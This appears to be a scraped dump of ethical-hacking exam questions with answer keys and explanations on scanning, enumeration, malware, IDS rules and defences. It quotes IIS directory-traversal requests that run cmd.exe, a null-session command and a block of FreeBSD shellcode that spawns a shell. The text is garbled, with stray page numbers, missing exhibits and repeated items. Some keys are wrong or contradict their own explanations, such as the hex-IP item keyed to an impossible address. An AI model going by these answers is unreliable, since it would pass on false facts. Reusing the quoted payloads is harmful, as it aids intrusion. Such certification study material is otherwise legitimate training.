46 You are scanning into the target network for the first time. You find very few conventional ports open. When you attempt to perform traditional service identification by connecting to the open ports, it yields either unreliable or no results. You are unsure of which protocols are being used. You need to discover as many different protocols as possible. Which kind of scan would you use to achieve this? (Choose the best answer) A. Nessus scan with TCP based pings. B. Nmap scan with the -sP (Ping scan) switch. C. Netcat scan with the -u -e switches. D. Nmap with the -sO (Raw IP packets) switch.

D (Explanation: Running Nmap with the -sO switch will do a IP Protocol Scan. The IP protocol scan is a bit different than the other nmap scans. The IP protocol scan is searching for additional IP protocols in use by the remote station, such as ICMP, TCP, and UDP. If a router is scanned, additional IP protocols such as EGP or IGP may be identified. 29)

83 While reviewing the result of scanning run against a target network you come across the following: 49 Which among the following can be used to get this output? A. A Bo2k system query. B. nmap protocol scan C. A sniffer D. An SNMP walk

D (Explanation: SNMP lets you "read" information from a device. You make a query of the server (generally known as the "agent"). The agent gathers the information from the host system and returns the answer to your SNMP client. It's like having a single interface for all your informative Unix commands. Output like system.sysContact.0 is called a MIB.)

539 Steven the hacker realizes that the network administrator of company is using syskey to protect organization resources in the Windows 2000 Server. Syskey independently encrypts the hashes so that physical access to the server, tapes, or ERDs is only first step to cracking the passwords. Steven must break through the encryption used by syskey before he can attempt to brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker" targeting the Windows 2000 Server machine in attempting to crack the hash used by Syskey. He needs to configure the encryption level before he can launch attach. How many bits does Syskey use for encryption? A. 40 bit B. 64 bit C. 256 bit D. 128 bit

D (Explanation: SYSKEY is a utility that encrypts the hashed password information in a SAM database using a 128-bit encryption key.)

564 Jim was having no luck performing a penetration test on his company's network. He was running the test from home and had downloaded every security scanner he could lay his hands on. Despite knowing the IP range of all of the systems and the exact network configuration, Jim was unable to get any useful results. Why is Jim having these problems? A. Security scanners can't perform vulnerability linkage B. Security Scanners are not designed to do testing through a firewall C. Security Scanners are only as smart as their database and can't find unpublished vulnerabilities D. All of the above

D (Explanation: Security scanners are designed to find vulnerabilities but not to use them, also they will only find well known vulnerabilities that and no zero day exploits. Therefore you can't use a security scanner for penetration testing but need a more powerful program. 342)

560 Why would you consider sending an email to an address that you know does not exist within the company you are performing a Penetration Test for? A. To determine who is the holder of the root account B. To perform a DoS C. To create needless SPAM D. To illicit a response back that will reveal information about email servers and how they treat undeliverable mail E. To test for virus protection

D (Explanation: Sending a bogus email is one way to find out more about internal servers. Also, to gather additional IP addresses and learn how they treat mail.)

374 Annie has just succeeded is stealing a secure cookie via a XSS attack. She is able to replay the cookie even while the session is valid on the server. Why do you think this is possible? A. Any Cookie can be replayed irrespective of the session status B. The scenario is invalid as a secure cookie can't be replayed C. It works because encryption is performed at the network layer (layer 1 encryption) D. It works because encryption is performed at the application layer (Single Encryption Key)

D (Explanation: Single key encryption (conventional cryptography) uses a single word or phrase as the key. The same key is used by the sender to encrypt and the receiver to decrypt. Sender and receiver initially need to have a secure way of passing the key from one to the other. With TLS or SSL this would not be possible.)

312 Bob waits near a secured door, holding a box. He waits until an employee walks up to the secured door and uses the special card in order to access the restricted area of the target company. Just as the employee opens the door, Bob walks up to the employee (still holding the box) and asks the employee to hold the door open so that he can enter. What is the best way to undermine the social engineering activity of tailgating? A. issue special cards to access secured doors at the company and provide a one-time only brief 187 description of use of the special card B. to post a sign that states "no tailgating" next to the special card reader adjacent to the secured door C. setup a mock video camera next to the special card reader adjacent to the secured door D. to educate all of the employees of the company on best security practices on a recurring basis

D (Explanation: Tailgating will not work in small company's where everyone knows everyone, and neither will it work in very large companies where everyone is required to swipe a card to pass, but it's a very simple and effective social engineering attack against mid-sized companies where it's common for one employee not to know everyone. There is two ways of stop this attack either by buying expensive perimeter defense in form of gates that only let on employee pass at every swipe of a card or by educating every employee on a recurring basis.)

523 A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) then it was intended to hold. What is the most common cause of buffer overflow in software today? A. Bad permissions on files. B. High bandwidth and large number of users. C. Usage of non standard programming languages. D. Bad quality assurance on software produced.

D (Explanation: Technically, a buffer overflow is a problem with the program's internal 318 implementation.)

165 Exhibit: 97 Study the following log extract and identify the attack. A. Hexcode Attack B. Cross Site Scripting C. Multiple Domain Traversal Attack D. Unicode Directory Traversal Attack

D (Explanation: The "Get /msadc/....../....../....../winnt/system32/cmd.exe?" shows that a Unicode Directory Traversal Attack has been performed.)

426 Melissa is a virus that attacks Microsoft Windows platforms. To which category does this virus belong? A. Polymorphic B. Boot Sector infector 254 C. System D. Macro

D (Explanation: The Melissa macro virus propagates in the form of an email message containing an infected Word document as an attachment.)

218 In the following example, which of these is the "exploit"? 129 Today, Microsoft Corporation released a security notice. It detailed how a person could bring down the Windows 2003 Server operating system, by sending malformed packets to it. They detailed how this malicious process had been automated using basic scripting. Even worse, the new automated method for bringing down the server has already been used to perform denial of service attacks on many large commercial websites. Select the best answer. A. Microsoft Corporation is the exploit. B. The security "hole" in the product is the exploit. C. Windows 2003 Server D. The exploit is the hacker that would use this vulnerability. E. The documented method of how to use the vulnerability to gain unprivileged access.

E (Explanation: Explanations: Microsoft is not the exploit, but if Microsoft documents how the vulnerability can be used to gain unprivileged access, they are creating the exploit. If they just say that there is a hole in the product, then it is only a vulnerability. The security "hole" in the product is called the "vulnerability". It is documented in a way that shows how to use the vulnerability to gain unprivileged access, and it then becomes an "exploit". In the example given, Windows 2003 Server is the TOE (Target of Evaluation). A TOE is an IT System, product or component that requires security evaluation or is being identified. The hacker that would use this vulnerability is exploiting it, but the hacker is not the exploit. The documented method of how to use the vulnerability to gain unprivileged access is the correct answer.)

296 Peter is a Network Admin. He is concerned that his network is vulnerable to a smurf attack. What should Peter do to prevent a smurf attack? Select the best answer. A. He should disable unicast on all routers B. Disable multicast on the router C. Turn off fragmentation on his router D. Make sure all anti-virus protection is updated on all systems E. Make sure his router won't take a directed broadcast

E (Explanation: Explanations: Unicasts are one-to-one IP transmissions, by disabling this he would disable most network transmissions but still not prevent the smurf attack. Turning of multicast or fragmentation on the router has nothing to do with Peter's concerns as a smurf attack uses broadcast, not multicast and has nothing to do with fragmentation. Anti-virus protection will not help prevent a smurf attack. A smurf attack is a broadcast from a spoofed source. If directed broadcasts are enabled on the destination all the computers at the destination will respond to the spoofed source, which is really the victim. Disabling directed broadcasts on a router can prevent the attack.)

191 What is the BEST alternative if you discover that a rootkit has been installed on one of your computers? 114 A. Copy the system files from a known good system B. Perform a trap and trace C. Delete the files and try to determine the source D. Reload from a previous backup E. Reload from known good media

E (Explanation: If a rootkit is discovered, you will need to reload from known good media. This typically means performing a complete reinstall.)

110 You want to scan the live machine on the LAN, what type of scan you should use? A. Connect B. SYN C. TCP D. UDP E. PING

E (Explanation: The ping scan is one of the quickest scans that nmap performs, since no actual ports are queried. Unlike a port scan where thousands of packets are transferred between two stations, a ping scan requires only two frames. This scan is useful for locating active devices or determining if ICMP is passing through a firewall. 65)

429 You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe. What caused this? GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..xc1x1c../..xc1x1c../..xc1x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir 256 A. The Morris worm B. The PIF virus C. Trinoo D. Nimda E. Code Red F. Ping of Death

D (Explanation: The Nimda worm modifies all web content files it finds. As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby, infecting the browsing system. The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines and allow intruders the ability to execute arbitrary commands within the Local System security context on machines running the unpatched versions of IIS.)

129 Sandra has been actively scanning the client network on which she is doing a vulnerability assessment test. While conducting a port scan she notices open ports in the range of 135 to 139. What protocol is most likely to be listening on those ports? A. Finger B. FTP C. Samba D. SMB

D (Explanation: The SMB (Server Message Block) protocol is used among other things for file sharing in Windows NT / 2000. In Windows NT it ran on top of NBT (NetBIOS over TCP/IP), which used the famous ports 137, 138 (UDP) and 139 (TCP). In Windows 2000, Microsoft added the possibility to run SMB directly over TCP/IP, without the extra layer of NBT. For this they use TCP port 445.)

138 One of your team members has asked you to analyze the following SOA record. What is the TTL? Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400. A. 200303028 B. 3600 C. 604800 82 D. 2400 E. 60 F. 4800

D (Explanation: The SOA includes a timeout value. This value can tell an attacker how long any DNS "poisoning" would last. It is the last set of numbers in the record.)

360 Jim is having no luck performing a penetration test in company's network. He is running the tests from home and has downloaded every security scanner that he could lay his hands on. Despite knowing the IP range of all the systems, and the exact network configuration, Jim is unable to get any useful results. Why is Jim having these problems? A. Security scanners are not designed to do testing through a firewall. B. Security scanners cannot perform vulnerability linkage. C. Security scanners are only as smart as their database and cannot find unpublished vulnerabilities. D. All of the above.

D (Explanation: The Security scanners available online are often to "outdated" to perform a live pentest against a victim.)

79 Which type of Nmap scan is the most reliable, but also the most visible, and likely to be picked up by and IDS? 47 A. SYN scan B. ACK scan C. RST scan D. Connect scan E. FIN scan

D (Explanation: The TCP full connect (-sT) scan is the most reliable.)

506 306 Exhibit: Given the following extract from the snort log on a honeypot, what do you infer from the attack? A. A new port was opened B. A new user id was created C. The exploit was successful D. The exploit was not successful

D (Explanation: The attacker submits a PASS to the honeypot and receives a login incorrect before disconnecting.)

112 Nathalie would like to perform a reliable scan against a remote target. She is not concerned about being stealth at this point. Which of the following type of scans would be the most accurate and reliable? A. A FIN Scan B. A Half Scan C. A UDP Scan D. The TCP Connect Scan

D (Explanation: The connect() system call provided by your operating system is used to open a connection to every interesting port on the machine. If the port is listening, connect() will succeed, otherwise the port isn't reachable. One strong advantage to this technique is that you don't need any special privileges. This is the fastest scanning method supported by nmap, and is available with the -t (TCP) option. The big downside is that this sort of scan is easily detectable and filterable.)

316 Which type of hacker represents the highest risk to your network? A. script kiddies B. grey hat hackers C. black hat hackers D. disgruntled employees

D (Explanation: The disgruntled users have some permission on your database, versus a hacker who might not get into the database. Global Crossings is a good example of how a disgruntled employee -- who took the internal payroll database home on a hard drive -- caused big problems for the telecommunications company. The employee posted the names, Social Security numbers and birthdates of company employees on his Web site. He may have been one of the factors that helped put them out of business. 190)

489 You have discovered that an employee has attached a modem to his telephone line and workstation. He has used this modem to dial in to his workstation, thereby bypassing your firewall. A security breach has occurred as a direct result of this activity. The employee explains that he used the modem because he had to download software for a department project. What can you do to solve this problem? 294 A. Install a network-based IDS B. Reconfigure the firewall C. Conduct a needs analysis D. Enforce your security policy

D (Explanation: The employee was unaware of security policy.)

48 You are having problems while retrieving results after performing port scanning during internal testing. You verify that there are no security devices between you and the target system. When both stealth and connect scanning do not work, you decide to perform a NULL scan with NMAP. The first few systems scanned shows all ports open. Which one of the following statements is probably true? A. The systems have all ports open. B. The systems are running a host based IDS. C. The systems are web servers. D. The systems are running Windows.

D (Explanation: The null scan turns off all flags, creating a lack of TCP flags that should never occur in the real world. If the port is closed, a RST frame should be returned and a null scan to an open port results in no response. Unfortunately Microsoft (like usual) decided to completely ignore the standard and do things their own way. Thus this scan type will not work against systems running Windows as they choose not to response at all. This is a good way to distinguish that the system being scanned is running Microsoft Windows. 30)

136 What is the following command used for? net use \targetipc$ "" /u:"" A. Grabbing the etc/passwd file B. Grabbing the SAM C. Connecting to a Linux computer through Samba. D. This command is used to connect as a null session E. Enumeration of Cisco routers 81

D (Explanation: The null session is one of the most debilitating vulnerabilities faced by Windows. Null sessions can be established through port 135, 139, and 445.)

239 Which of the following Netcat commands would be used to perform a UDP scan of the lower 1024 ports? 143 A. Netcat -h -U B. Netcat -hU <host(s.> C. Netcat -sU -p 1-1024 <host(s.> D. Netcat -u -v -w2 <host> 1-1024 E. Netcat -sS -O target/1024

D (Explanation: The proper syntax for a UDP scan using Netcat is "Netcat -u -v -w2 <host> 1-1024". Netcat is considered the Swiss-army knife of hacking tools because it is so versatile.)

474 Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn an interactive shell and plans to deface the main web page. He first attempts to use the "Echo" command to simply overwrite index.html and remains unsuccessful. He then attempts to delete the page and achieves no progress. Finally, he tries to overwrite it with another page again in vain. What is the probable cause of Bill's problem? A. The system is a honeypot. B. There is a problem with the shell and he needs to run the attack again. C. You cannot use a buffer overflow to deface a web page. D. The HTML file has permissions of ready only.

D (Explanation: The question states that Bill had been able to spawn an interactive shell. By this statement we can tell that the buffer overflow and its corresponding code was enough to spawn a shell. Any shell should make it possible to change the webpage. So we either don't have sufficient privilege to change the webpage (answer D) or it's a honeypot (answer A). We think the preferred answer is D)

201 You are the Security Administrator of Xtrinity, Inc. You write security policies and conduct assesments to protect the company's network. During one of your periodic checks to see how well policy is being observed by the employees, you discover an employee has attached a modem to his telephone line and workstation. He has used this modem to dial in to his workstation, thereby bypassing your firewall. A security breach has occurred as a direct result of this activity. The employee explains that he used the modem because he had to download software for a department project. How would you resolve this situation? A. Reconfigure the firewall B. Conduct a needs analysis C. Install a network-based IDS D. Enforce the corporate security policy

D (Explanation: The security policy is meant to always be followed until changed. If a need rises to perform actions that might violate the security policy you'll have to find another way to accomplish the task or wait until the policy has been changed.)

447 Which of the following snort rules look for FTP root login attempts? A. alert tcp -> any port 21 (msg:"user root";) B. alert tcp -> any port 21 (message:"user root";) C. alert ftp -> ftp (content:"user password root";) D. alert tcp any any -> any any 21 (content:"user root";)

D (Explanation: The snort rule header is built by defining action (alert), protocol (tcp), from IP subnet port (any any), to IP subnet port (any any 21), Payload Detection Rule Options (content:"user root";))

97 You have initiated an active operating system fingerprinting attempt with nmap against a target system: [root@ceh NG]# /usr/local/bin/nmap -sT -O 10.0.0.1 Starting nmap 3.28 ( www.insecure.org/nmap/) at 2003-06-18 19:14 IDT Interesting ports on 10.0.0.1: (The 1628 ports scanned but not shown below are in state: closed) Port State Service 21/tcp filtered ftp 22/tcp filtered ssh 25/tcp open smtp 80/tcp open http 135/tcp open loc-srv 139/tcp open netbios-ssn 389/tcp open LDAP 443/tcp open https 465/tcp open smtps 1029/tcp open ms-lsa 1433/tcp open ms-sql-s 2301/tcp open compaqdiag 57 5555/tcp open freeciv 5800/tcp open vnc-http 5900/tcp open vnc 6000/tcp filtered X11 Remote operating system guess: Windows XP, Windows 2000, NT4 or 95/98/98SE Nmap run completed -- 1 IP address (1 host up) scanned in 3.334 seconds Using its fingerprinting tests nmap is unable to distinguish between different groups of Microsoft based operating systems - Windows XP, Windows 2000, NT4 or 95/98/98SE. What operating system is the target host running based on the open ports shown above? A. Windows XP B. Windows 98 SE C. Windows NT4 Server D. Windows 2000 Server

D (Explanation: The system is reachable as an active directory domain controller (port 389, LDAP))

149 A zone file consists of which of the following Resource Records (RRs)? A. DNS, NS, AXFR, and MX records B. DNS, NS, PTR, and MX records C. SOA, NS, AXFR, and MX records D. SOA, NS, A, and MX records

D (Explanation: The zone file typically contains the following records: 88 SOA - Start Of Authority NS - Name Server record MX - Mail eXchange record A - Address record)

89 A distributed port scan operates by: A. Blocking access to the scanning clients by the targeted host B. Using denial-of-service software against a range of TCP ports C. Blocking access to the targeted host by each of the distributed scanning clients D. Having multiple computers each scan a small number of ports, then correlating the results

D (Explanation: Think of dDoS (distributed Denial of Service) where you use a large number of computers to create simultaneous traffic against a victim in order to shut them down.)

499 Neil is closely monitoring his firewall rules and logs on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web site during work hours, without any consideration for others. Neil knows that he has an up-todate content filtering system and such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction? A. They are using UDP that is always authorized at the firewall B. They are using an older version of Internet Explorer that allow them to bypass the proxy server C. They have been able to compromise the firewall, modify the rules, and give themselves proper access D. They are using tunneling software that allows them to communicate with protocols in a way it was not intended

D (Explanation: This can be accomplished by, for example, tunneling the http traffic over SSH if you have a SSH server answering to your connection, you enable dynamic forwarding in the ssh client and configure Internet Explorer to use a SOCKS Proxy for network traffic.)

524 While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect's workstation. He comes across a file that is called 'file.txt' but when he opens it, he find the following: What does this file contain? A. A picture that has been renamed with a .txt extension. B. An encrypted file. C. A uuencoded file. D. A buffer overflow.

D (Explanation: This is a buffer overflow exploit with its "payload" in hexadecimal format.)

163 What sequence of packets is sent during the initial TCP three-way handshake? A. SYN, URG, ACK B. FIN, FIN-ACK, ACK C. SYN, ACK, SYN-ACK D. SYN, SYN-ACK, ACK

D (Explanation: This is referred to as a "three way handshake." The "SYN" flags are requests by the TCP stack at one end of a socket to synchronize themselves to the sequence numbering for this new sessions. The ACK flags acknowlege earlier packets in this session. Obviously only the initial packet has no ACK flag, since there are no previous packets to acknowlege. Only the second packet (the first response from a server to a client) has both the SYN and the ACK bits set.)

167 Exhibit: The following is an entry captured by a network IDS. You are assigned the task of analyzing this entry. You notice the value 0x90, which is the most common NOOP instruction for the Intel processor. You figure that the attacker is attempting a buffer overflow attack. You also notice "/bin/sh" in the ASCII part of the output. As an analyst what would you conclude about the attack? A. The buffer overflow attack has been neutralized by the IDS B. The attacker is creating a directory on the compromised machine C. The attacker is attempting a buffer overflow attack and has succeeded D. The attacker is attempting an exploit that launches a command-line shell

D (Explanation: This log entry shows a hacker using a buffer overflow to fill the data buffer and trying to insert the execution of /bin/sh into the executable code part of the thread. It is probably an existing exploit that is used, or a directed attack with a custom built buffer overflow with the "payload" that launches the command shell. 100)

385 Your boss is attempting to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. What would you call such an attack? A. SQL Input attack B. SQL Piggybacking attack C. SQL Select attack D. SQL Injection attack

D (Explanation: This technique is known as SQL injection attack)

478 Statistics from cert.org and other leading security organizations has clearly showed a steady rise in the number of hacking incidents perpetrated against companies. What do you think is the main reason behind the significant increase in hacking attempts over the past years? A. It is getting more challenging and harder to hack for non technical people. B. There is a phenomenal increase in processing power. C. New TCP/IP stack features are constantly being added. D. The ease with which hacker tools are available on the Internet. 288

D (Explanation: Today you don't need to be a good hacker in order to break in to various systems, all you need is the knowledge to use search engines on the internet.)

241 A file integrity program such as Tripwire protects against Trojan horse attacks by: A. Automatically deleting Trojan horse programs B. Rejecting packets generated by Trojan horse programs C. Using programming hooks to inform the kernel of Trojan horse behavior D. Helping you catch unexpected changes to a system utility file that might indicate it had been replaced by a Trojan horse

D (Explanation: Tripwire generates a database of the most common files and directories on your system. Once it is generated, you can then check the current state of your system against the 144 original database and get a report of all the files that have been modified, deleted or added. This comes in handy if you allow other people access to your machine and even if you don't, if someone else does get access, you'll know if they tried to modify files such as /bin/login etc.)

286 What would best be defined as a security test on services against a known vulnerability database using an automated tool? 172 A. A penetration test B. A privacy review C. A server audit D. A vulnerability assessment

D (Explanation: Vulnerability assessment is the process of identifying and quantifying vulnerabilities in a system. The system being studied could be a physical facility like a nuclear power plant, a computer system, or a larger system (for example the communications infrastructure or water infrastructure of a region).)

496 During the intelligence gathering phase of a penetration test, you come across a press release by a security products vendor stating that they have signed a multi-million dollar agreement with the company you are targeting. The contract was for vulnerability assessment tools and network based IDS systems. While researching on that particular brand of IDS you notice that its default installation allows it to perform sniffing and attack analysis on one NIC and caters to its management and reporting on another NIC. The sniffing interface is completely unbound from the TCP/IP stack by default. Assuming the defaults were used, how can you detect these sniffing interfaces? A. Use a ping flood against the IP of the sniffing NIC and look for latency in the responses. B. Send your attack traffic and look for it to be dropped by the IDS. C. Set your IP to that of the IDS and look for it as it attempts to knock your computer off the network. D. The sniffing interface cannot be detected.

D (Explanation: When a Nic is set to Promiscuous mode it just blindly takes whatever comes through to it network interface and sends it to the Application layer. This is why they are so hard to detect. Actually you could use ARP requests and Send them to every pc and the one which responds to all the requests can be identified as a NIC on Promiscuous mode and there are some very special programs that can do this for you. But considering the alternatives in the question the 301 right answer has to be that the interface cannot be detected.)

203 Fingerprinting an Operating System helps a cracker because: A. It defines exactly what software you have installed B. It opens a security-delayed window based on the port being scanned C. It doesn't depend on the patches that have been applied to fix existing security holes D. It informs the cracker of which vulnerabilities he may be able to exploit on your system

D (Explanation: When a cracker knows what OS and Services you use he also knows which exploits might work on your system. If he would have to try all possible exploits for all possible Operating Systems and Services it would take too long time and the possibility of being detected increases.)

470 You are the security administrator for a large network. You want to prevent attackers from running any sort of traceroute into your DMZ and discover the internal structure of publicly accessible areas of the network. How can you achieve this? A. Block ICMP at the firewall. B. Block UDP at the firewall. C. Both A and B. D. There is no way to completely block doing a trace route into this area.

D (Explanation: When you run a traceroute to a target network address, you send a UDP packet with one time to live (TTL) to the target address. The first router this packet hits decreases the TTL to 0 and rejects the packet. Now the TTL for the packet is expired. The router sends back an ICMP message type 11 (Exceeded) code 0 (TTL--Exceeded) packet to your system with a source address. Your system displays the round-trip time for that first hop and sends out the next UDP packet with a TTL of 2.This process continues until you receive an ICMP message type 3 (Unreachable) code 3 (Port--Unreachable) from the destination system. Traceroute is completed when your machine receives a Port-Unreachable message.If you receive a message with three asterisks [* * *] during the traceroute, a router in the path doesn't return ICMP messages. Traceroute will continue to send UDP packets until the destination is reached or the maximum number of hops is exceeded. 283)

272 Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use this tool on the Windows Platform you must install a packet capture library. What is the name of this library? 164 A. PCAP B. NTPCAP C. LibPCAP D. WinPCAP

D (Explanation: WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.)

526 #define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)8), (((x)&0xff0000)16), (((x)&0xff000000)24) char infin_loop[]= /* for testing purposes */ "\xEB\xFE"; 320 char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */ "\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43" "\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0" "\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0" "\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80" "\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9" "\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75" "\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd" "\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46" "\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56" "\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53" "\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30" "\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e" "\x67\x6c\x69\x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC]; static char *magic_str=NULL; int before_len=0; char *target=NULL, *username="user", *password=NULL; struct targets getit; The following exploit code is extracted from what kind of attack? A. Remote password cracking attack B. SQL Injection C. Distributed Denial of Service D. Cross Site Scripting E. Buffer Overflow

E (Explanation: This is a buffer overflow with it's payload in hex format. 321)

587 This is an authentication method in which is used to prove that a party knows a password without transmitting the password in any recoverable form over a network. This authentication is secure because the password is never transmitted over the network, even in hashed form; only a random number and an encrypted random number are sent. A. Realm Authentication B. SSL Authentication C. Basic Form Authentication D. Cryptographic Authentication E. Challenge/Response Authentication

E Explanation: Challenge-Response Authentication The secure Challenge-Response Authentication Mechanism (CRAM-MD5) avoids passing a cleartext password over the network when you access your email account, ensuring that your login details cannot be captured and used by anyone in transit. http://www.neomailbox.com/component/content/article/212-hardware-token-authentication)

480 While examining a log report you find out that an intrusion has been attempted by a machine whose IP address is displayed as 0xde.0xad.0xbe.0xef. It looks to you like a hexadecimal number. You perform a ping 0xde.0xad.0xbe.0xef. Which of the following IP addresses will respond to the ping and hence will likely be responsible for the the intrusion ? A. 192.10.25.9 B. 10.0.3.4 289 C. 203.20.4.5 D. 222.273.290.239 E. 222.173.290.239

E Explanation: Convert the hex number to binary and then to decimal. 0xde.0xad.0xbe.0xef translates to 222.173.190.239 and not 222.273.290.239 0xef = 15*1 = 15 14*16 = 224 ______ = 239 0xbe = 14*1 = 14 11*16 = 176 ______ = 190 0xad = 13*1 = 13 10*16 = 160 ______ = 173 0xde = 14*1 = 14 13*16 = 208 ______ = 222)

751 454 Which of the following represent weak password? (Select 2 answers) A. Passwords that contain letters, special characters, and numbers Example: ap1$%##f@52 B. Passwords that contain only numbers Example: 23698217 C. Passwords that contain only special characters Example: &*#@!(%) D. Passwords that contain letters and numbers Example: meerdfget123 E. Passwords that contain only letters Example: QWERTYKLRTY F. Passwords that contain only special characters and numbers Example: 123@$45 G. Passwords that contain only letters and special characters Example: bob@&ba H. Passwords that contain Uppercase/Lowercase from a dictionary list Example: OrAnGe

E,H)

626 Peter extracts the SID list from Windows 2008 Server machine using the hacking tool "SIDExtracter". Here is the output of the SIDs: From the above list identify the user account with System Administrator privileges? A. John B. Rebecca C. Sheela D. Shawn E. Somia F. Chang G. Micah

F

736 You are writing security policy that hardens and prevents Footprinting attempt by Hackers. Which of the following countermeasures will NOT be effective against this attack? A. Configure routers to restrict the responses to Footprinting requests B. Configure Web Servers to avoid information leakage and disable unwanted protocols C. Lock the ports with suitable Firewall configuration D. Use an IDS that can be configured to refuse suspicious traffic and pick up Footprinting patterns E. Evaluate the information before publishing it on the Website/Intranet F. Monitor every employee computer with Spy cameras, keyloggers and spy on them G. Perform Footprinting techniques and remove any sensitive information found on DMZ sites H. Prevent search engines from caching a Webpage and use anonymous registration services I. Disable directory and use split-DNS

F

134 Peter extracts the SIDs list from Windows 2000 Server machine using the hacking tool "SIDExtractor". Here is the output of the SIDs: s-1-5-21-1125394485-807628933-54978560-100Johns s-1-5-21-1125394485-807628933-54978560-652Rebecca s-1-5-21-1125394485-807628933-54978560-412Sheela s-1-5-21-1125394485-807628933-54978560-999Shawn s-1-5-21-1125394485-807628933-54978560-777Somia s-1-5-21-1125394485-807628933-54978560-500chang s-1-5-21-1125394485-807628933-54978560-555Micah From the above list identify the user account with System Administrator privileges. A. John B. Rebecca C. Sheela D. Shawn E. Somia F. Chang G. Micah

F (Explanation: The SID of the built-in administrator will always follow this example: S-1-5-domain- 500 80)

680 E-mail tracking is a method to monitor and spy the delivered e-mails to the intended recipient. Select a feature, which you will NOT be able to accomplish with this probe? A. When the e-mail was received and read B. Send destructive e-mails C. GPS location and map of the recipient D. Time spent on reading the e-mails E. Whether or not the recipient visited any links sent to them F. Track PDF and other types of attachments G. Set messages to expire after specified time H. Remote control the User's E-mail client application and hijack the traffic

H

215 DRAG DROP Drag the term to match with it's description Exhibit:

127)

100 Pentest results indicate that voice over IP traffic is traversing a network. Which of the following tools will decode a packet capture and extract the voice conversations? A. Cain B. John the Ripper C. Nikto D. Hping

A

102 Which set of access control solutions implements two-factor authentication? A. USB token and PIN B. Fingerprint scanner and retina scanner C. Password and PIN D. Account and password

A

124 Which of the following items of a computer system will an anti-virus program scan for viruses? A. Boot Sector B. Deleted Files C. Windows Process List D. Password Protected Files

A

131 Which of the following identifies the three modes in which Snort can be configured to run? A. Sniffer, Packet Logger, and Network Intrusion Detection System B. Sniffer, Network Intrusion Detection System, and Host Intrusion Detection System C. Sniffer, Host Intrusion Prevention System, and Network Intrusion Prevention System D. Sniffer, Packet Logger, and Host Intrusion Prevention System

A

134 Smart cards use which protocol to transfer the certificate in a secure manner? A. Extensible Authentication Protocol (EAP) B. Point to Point Protocol (PPP) C. Point to Point Tunneling Protocol (PPTP) D. Layer 2 Tunneling Protocol (L2TP)

A

150 Which of the following open source tools would be the best choice to scan a network for potential targets? A. NMAP B. NIKTO C. CAIN D. John the Ripper

A

154 How does an operating system protect the passwords used for account logins? A. The operating system performs a one-way hash of the passwords. B. The operating system stores the passwords in a secret file that users cannot find C. The operating system encrypts the passwords, and decrypts them when needed D. The operating system stores all passwords in a protected segment of non-volatile memory.

A

16 Which of the following lists are valid data-gathering activities associated with a risk assessment? A. Threat identification, vulnerability identification, control analysis B. Threat identification, response identification, mitigation identification C. Attack profile, defense profile, loss profile D. System profile, vulnerability identification, security determination

A

162 Which of the following does proper basic configuration of snort as a network intrusion detection system require? A. Limit the packets captured to the snort configuration file B. Capture every packet on the network segment. C. Limit the packets captured to a single segment. D. Limit the packets captured to the /var/log/snort directory.

A

163 How is sniffing broadly categorized? A. Active and passive B. Broadcast and unicast C. Unmanaged and managed D. Filtered and unfiltered

A

167 A botnet can be managed through which of the following? A. IRC B. E-Mail C. Linkedin and Facebook D. A vulnerable FTP server

A

170 Which of the following is optimized for confidential communications, such as bidirectional voice and video? A. RC4 B. RC5 C. MD4 D. MD5

A

